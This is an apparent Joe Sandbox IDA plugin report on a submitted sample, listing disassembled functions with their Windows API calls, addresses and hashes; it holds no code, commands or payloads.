API ID: HandleLoadModuleString$Message
String ID: %s (%d) : ==> %s: %s %s
API String ID: 4072794657-3128320259
Opcode ID: 74f762a243490af3e21926f95c287bd2717c1ce74ff5ac60a253b49c4bec9b6c
Instruction ID: faa68229d9e949691d7b8ccac6b11c3858ffae2a420edfa4155c95c3bd6bb719
Opcode Fuzzy Hash: 74f762a243490af3e21926f95c287bd2717c1ce74ff5ac60a253b49c4bec9b6c
Instruction Fuzzy Hash: 690112F6900208BFE711ABA4DD89EEB776CE708701F404595B746E2081EB749E848FB5

Uniqueness

Uniqueness Score: -1.00%

Function 0019096B Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(0177EB30,0177EB30), ref: 0019097B
EnterCriticalSection.KERNEL32(0177EB10,00000000), ref: 0019098D
TerminateThread.KERNEL32(00000000,000001F6), ref: 0019099B
WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 001909A9
CloseHandle.KERNEL32(00000000), ref: 001909B8
InterlockedExchange.KERNEL32(0177EB30,000001F6), ref: 001909C8
LeaveCriticalSection.KERNEL32(0177EB10), ref: 001909CF

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: c835c514177cc50cc7ce2607422284dc92e9930bb267ec9d467af6be985fdb38
Instruction ID: cab14d2b4fae060308a52a955a0268ae03cabc2d764133c3271d08ad2a96f963
Opcode Fuzzy Hash: c835c514177cc50cc7ce2607422284dc92e9930bb267ec9d467af6be985fdb38
Instruction Fuzzy Hash: 16F0CD31442512ABDB565F94EE89AD67A25BF05706F401166F10150CA1C77598A5CFD0

Uniqueness

Uniqueness Score: -1.00%

Function 00125D0A Relevance: 9.3, APIs: 6, Instructions: 276COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 00125D30
GetWindowRect.USER32(?,?), ref: 00125D71
ScreenToClient.USER32(?,?), ref: 00125D99
GetClientRect.USER32(?,?), ref: 00125ED7
GetWindowRect.USER32(?,?), ref: 00125EF8

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: Rect$Client$Window$Screen
String ID:
API String ID: 1296646539-0
Opcode ID: 341e629f54b1935e3dae4b6610810d3734ae3fa14c9c727c5a31a0fe40a22849
Instruction ID: 69e8bf84840d925fef6984bab1eed63a50321d96e3826328f150e91e474d6a39
Opcode Fuzzy Hash: 341e629f54b1935e3dae4b6610810d3734ae3fa14c9c727c5a31a0fe40a22849
Instruction Fuzzy Hash: A0B17934A0065ADFDB14CFA9D8807EEB7F2FF58310F15851AE8A9D7250DB30AA61DB50

Uniqueness

Uniqueness Score: -1.00%

Function 001501B7 Relevance: 9.3, APIs: 6, Instructions: 269COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 001500BA
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 001500D6
__allrem.LIBCMT ref: 001500ED
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0015010B
__allrem.LIBCMT ref: 00150122
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00150140

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
String ID:
API String ID: 1992179935-0
Opcode ID: c0aa086816e9a6b10c8594d9af3fc1b6618250ddc70608c46d0048b3e4fbc764
Instruction ID: b40eda4b03e8d6a28786e632f58da71fc344d61cc1a40011fbf452a437e7aa3e
Opcode Fuzzy Hash: c0aa086816e9a6b10c8594d9af3fc1b6618250ddc70608c46d0048b3e4fbc764
Instruction Fuzzy Hash: 48813972A00B02DBD7259F68CC81B6B73E8AF55365F24413DF820DA7D1E7B0D9098750

Uniqueness

Uniqueness Score: -1.00%

Function 001A1D10 Relevance: 9.3, APIs: 6, Instructions: 254networkCOMMON

Download Yara Rule

APIs

Part of subcall function 001A3149: select.WSOCK32(00000000,?,00000000,00000000,?), ref: 001A3195

__WSAFDIsSet.WSOCK32(00000000,?), ref: 001A1DC0
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 001A1DE1
WSAGetLastError.WSOCK32 ref: 001A1DF2
inet_ntoa.WSOCK32(?), ref: 001A1E8C
htons.WSOCK32(?), ref: 001A1EDB
_strlen.LIBCMT ref: 001A1F35

Part of subcall function 001839E8: _strlen.LIBCMT ref: 001839F2

Part of subcall function 00126D9E: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000002,?,?,?,?,0013CF58,?,?,?), ref: 00126DBA
Part of subcall function 00126D9E: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,?,?,?,0013CF58,?,?,?), ref: 00126DED

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: ByteCharMultiWide_strlen$ErrorLasthtonsinet_ntoaselect
String ID:
API String ID: 1923757996-0
Opcode ID: 3f1231ec6bbcfb26b7a97a8110154c506a1eef032520cd99b6e12376540bf43e
Instruction ID: ddb4e01e9db819443778273519f7e83e28a708da1c8ccce3de86515a41b9e697
Opcode Fuzzy Hash: 3f1231ec6bbcfb26b7a97a8110154c506a1eef032520cd99b6e12376540bf43e
Instruction Fuzzy Hash: 3BA10234504350AFC324DF24D885F2A7BE5AF95318F54894CF4569B2E2CB31EE4ACB91

Uniqueness

Uniqueness Score: -1.00%

Function 001561FE Relevance: 9.2, APIs: 6, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,001482D9,001482D9,?,?,?,0015644F,00000001,00000001,8BE85006), ref: 00156258
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0015644F,00000001,00000001,8BE85006,?,?,?), ref: 001562DE
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 001563D8
__freea.LIBCMT ref: 001563E5

Part of subcall function 00153820: RtlAllocateHeap.NTDLL(00000000,?,001F1444,?,0013FDF5,?,?,0012A976,00000010,001F1440,001213FC,?,001213C6,?,00121129), ref: 00153852

__freea.LIBCMT ref: 001563EE
__freea.LIBCMT ref: 00156413

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: d217cd1eb6203953d932f455e532e4959d10dd7a8a8b5651314d9947ecde221a
Instruction ID: 87e96ef55620a2d83e53f0d98fbbee2eb1d1db037751389ee352efaccf4e7d48
Opcode Fuzzy Hash: d217cd1eb6203953d932f455e532e4959d10dd7a8a8b5651314d9947ecde221a
Instruction Fuzzy Hash: F551BF72A00216EFEB258F64CC81EAF77A9EB54751F554629FC29DF140EB34DC48C6A0

Uniqueness

Uniqueness Score: -1.00%

Function 001ABBDB Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00129CB3: _wcslen.LIBCMT ref: 00129CBD

Part of subcall function 001AC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,001AB6AE,?,?), ref: 001AC9B5
Part of subcall function 001AC998: _wcslen.LIBCMT ref: 001AC9F1
Part of subcall function 001AC998: _wcslen.LIBCMT ref: 001ACA68
Part of subcall function 001AC998: _wcslen.LIBCMT ref: 001ACA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 001ABCCA
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 001ABD25
RegCloseKey.ADVAPI32(00000000), ref: 001ABD6A
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 001ABD99
RegCloseKey.ADVAPI32(?,?,00000000), ref: 001ABDF3
RegCloseKey.ADVAPI32(?), ref: 001ABDFF

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
String ID:
API String ID: 1120388591-0
Opcode ID: c767dda3b85c227fb28506d778ade3e32ea9c7f8784615ac730c15cbe6a8c668
Instruction ID: 8341536acf91268060f8f16cddc38d8b9cba631a989c8e6590d549814f60b5de
Opcode Fuzzy Hash: c767dda3b85c227fb28506d778ade3e32ea9c7f8784615ac730c15cbe6a8c668
Instruction Fuzzy Hash: D4818C74208281AFD714DF64C8C5E2ABBE5FF85318F14896CF4598B2A2DB31ED45CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0017F7AD Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000035), ref: 0017F7B9
SysAllocString.OLEAUT32(00000001), ref: 0017F860
VariantCopy.OLEAUT32(0017FA64,00000000), ref: 0017F889
VariantClear.OLEAUT32(0017FA64), ref: 0017F8AD
VariantCopy.OLEAUT32(0017FA64,00000000), ref: 0017F8B1
VariantClear.OLEAUT32(?), ref: 0017F8BB

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: Variant$ClearCopy$AllocInitString
String ID:
API String ID: 3859894641-0
Opcode ID: ce0a69ad5b8375c9735c53c76db4ba454dbe3e55f698ee43a1302b97c0cd3de5
Instruction ID: cfedb8f72cc8c04c0a89081cd2f6004f6c2115afa10e770ad2c978676e934d63
Opcode Fuzzy Hash: ce0a69ad5b8375c9735c53c76db4ba454dbe3e55f698ee43a1302b97c0cd3de5
Instruction Fuzzy Hash: 5451E431600310BACF24AB65D895B6AB3B8EF55314F24D46EF909EF291DB708D42C7A6

Uniqueness

Uniqueness Score: -1.00%

Function 0019910C Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 383COMMON

Download Yara Rule

APIs

Part of subcall function 00127620: _wcslen.LIBCMT ref: 00127625

Part of subcall function 00126B57: _wcslen.LIBCMT ref: 00126B6A

GetOpenFileNameW.COMDLG32(00000058), ref: 001994E5
_wcslen.LIBCMT ref: 00199506
_wcslen.LIBCMT ref: 0019952D
GetSaveFileNameW.COMDLG32(00000058), ref: 00199585

Strings

X, xrefs: 00199412

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: _wcslen$FileName$OpenSave
String ID: X
API String ID: 83654149-3081909835
Opcode ID: cb7fbcaa978dedd621f5328dfc16723848941c89a825f3bc0caf45fdabe467b6
Instruction ID: da55a7e08f00c6100c65fd816ef369106d71d1818928fb0d6244aba59464a60b
Opcode Fuzzy Hash: cb7fbcaa978dedd621f5328dfc16723848941c89a825f3bc0caf45fdabe467b6
Instruction Fuzzy Hash: 17E1C4315083509FDB24DF28D481A6EB7E4BF94314F04896DF8899B2A2DB31DD05CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0013920C Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 00139BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00139BB2

BeginPaint.USER32(?,?,?), ref: 00139241
GetWindowRect.USER32(?,?), ref: 001392A5
ScreenToClient.USER32(?,?), ref: 001392C2
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 001392D3
EndPaint.USER32(?,?,?,?,?), ref: 00139321
Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 001771EA

Part of subcall function 00139339: BeginPath.GDI32(00000000), ref: 00139357

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
String ID:
API String ID: 3050599898-0
Opcode ID: f0344e99d15fc775a7debb7735edb75ae7639caaf0eb1c96c233e95b594e22d0
Instruction ID: a3f1bbd2c272ca098544e23aa3209e2a43a0090a4f32de27bc03ef17c7caca88
Opcode Fuzzy Hash: f0344e99d15fc775a7debb7735edb75ae7639caaf0eb1c96c233e95b594e22d0
Instruction Fuzzy Hash: D6419D70104200EFD711DF24CC84FBA7BB8FB59724F140669F995972E1C7B19885DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 001907EF Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 0019080C
ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00190847
EnterCriticalSection.KERNEL32(?), ref: 00190863
LeaveCriticalSection.KERNEL32(?), ref: 001908DC
ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 001908F3
InterlockedExchange.KERNEL32(?,000001F6), ref: 00190921

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
String ID:
API String ID: 3368777196-0
Opcode ID: ad1fcac9c8d21d1a7aa1763c65883c5b8a1bf7eb797adc160dd75fa3518364aa
Instruction ID: e35a9088823485ef451b2a77e48d4d9ea1a47153e9935bb7fe8c902636976fa4
Opcode Fuzzy Hash: ad1fcac9c8d21d1a7aa1763c65883c5b8a1bf7eb797adc160dd75fa3518364aa
Instruction Fuzzy Hash: F6415971A00205EFDF15AF54DC85AAA77B8FF08314F1440B9ED04AA297DB30DEA5DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 001B81DB Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,0017F3AB,00000000,?,?,00000000,?,0017682C,00000004,00000000,00000000), ref: 001B824C
EnableWindow.USER32(00000000,00000000), ref: 001B8272
ShowWindow.USER32(FFFFFFFF,00000000), ref: 001B82D1
ShowWindow.USER32(00000000,00000004), ref: 001B82E5
EnableWindow.USER32(00000000,00000001), ref: 001B830B
SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 001B832F

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: 7177cf7dc8edc38fbdaf00c92862c478dad43b95ca9c9f7b5f0a03ac989c6143
Instruction ID: fd63c38b2c943bd87d0ae20526e655cefc61d09da52d715170d4dd8ab0a19b81
Opcode Fuzzy Hash: 7177cf7dc8edc38fbdaf00c92862c478dad43b95ca9c9f7b5f0a03ac989c6143
Instruction Fuzzy Hash: F3419434601644EFDB11DF15C899BE47BF5BB1AB14F1852A9E5084F672CB71AC81CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00184C7D Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00184C95
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00184CB2
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00184CEA
_wcslen.LIBCMT ref: 00184D08
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00184D10
_wcsstr.LIBVCRUNTIME ref: 00184D1A

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
String ID:
API String ID: 72514467-0
Opcode ID: f31c572f41458219c9b05be024488a0226906c8a1afab0dc13ac586f4b2c0eb4
Instruction ID: be9e2633402f4d26521169cb82cedf003621669d6f8bf2ecb1b1d131ca0822ee
Opcode Fuzzy Hash: f31c572f41458219c9b05be024488a0226906c8a1afab0dc13ac586f4b2c0eb4
Instruction Fuzzy Hash: 31216832604201BBEB156B79EC49EBB7B9CDF59750F10813EF809CA291EF60CD418BA0

Uniqueness

Uniqueness Score: -1.00%

Function 0019581E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON

Download Yara Rule

APIs

Part of subcall function 00123AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00123A97,?,?,00122E7F,?,?,?,00000000), ref: 00123AC2

_wcslen.LIBCMT ref: 0019587B
CoInitialize.OLE32(00000000), ref: 00195995
CoCreateInstance.OLE32(001BFCF8,00000000,00000001,001BFB68,?), ref: 001959AE
CoUninitialize.OLE32 ref: 001959CC

Strings

.lnk, xrefs: 00195876, 001958C1, 00195985

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
String ID: .lnk
API String ID: 3172280962-24824748
Opcode ID: 2ffd0544486885246b4263c0fd4f48b0fe665e5acb9793daf76d0c1d230866ca
Instruction ID: fc5aafa7a2a2065819fd0787e23ff6aea870ecd81b07fe6463bf0ef6dc12d0fb
Opcode Fuzzy Hash: 2ffd0544486885246b4263c0fd4f48b0fe665e5acb9793daf76d0c1d230866ca
Instruction Fuzzy Hash: 07D163716087119FCB04DF24D480A2ABBE2FF99314F14885DF88AAB361DB31EC45CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0018175D Relevance: 9.1, APIs: 6, Instructions: 68memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00180FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00180FCA
Part of subcall function 00180FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00180FD6
Part of subcall function 00180FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00180FE5
Part of subcall function 00180FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00180FEC
Part of subcall function 00180FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00181002

GetLengthSid.ADVAPI32(?,00000000,00181335), ref: 001817AE
GetProcessHeap.KERNEL32(00000008,00000000), ref: 001817BA
HeapAlloc.KERNEL32(00000000), ref: 001817C1
CopySid.ADVAPI32(00000000,00000000,?), ref: 001817DA
GetProcessHeap.KERNEL32(00000000,00000000,00181335), ref: 001817EE
HeapFree.KERNEL32(00000000), ref: 001817F5

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: b68ac1156a9a77892ead5f999303ec134f650fc7b1ce681aafb1ee62bc6eba08
Instruction ID: 0930f2620912d973ef496ed1cf2ea891c44d168d0e882b480c661d376ec6d1ac
Opcode Fuzzy Hash: b68ac1156a9a77892ead5f999303ec134f650fc7b1ce681aafb1ee62bc6eba08
Instruction Fuzzy Hash: A7117972600205FFDB14AFA8DC49BAE7BADEB45755F10411DF481A7210D736AA85CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 001814CE Relevance: 9.1, APIs: 6, Instructions: 64processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 001814FF
OpenProcessToken.ADVAPI32(00000000), ref: 00181506
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00181515
CloseHandle.KERNEL32(00000004), ref: 00181520
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0018154F
DestroyEnvironmentBlock.USERENV(00000000), ref: 00181563

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: 09fcc5ee278b05eccc5a37cb1dd0ec1d0da163acecf436616364c5049407a8b7
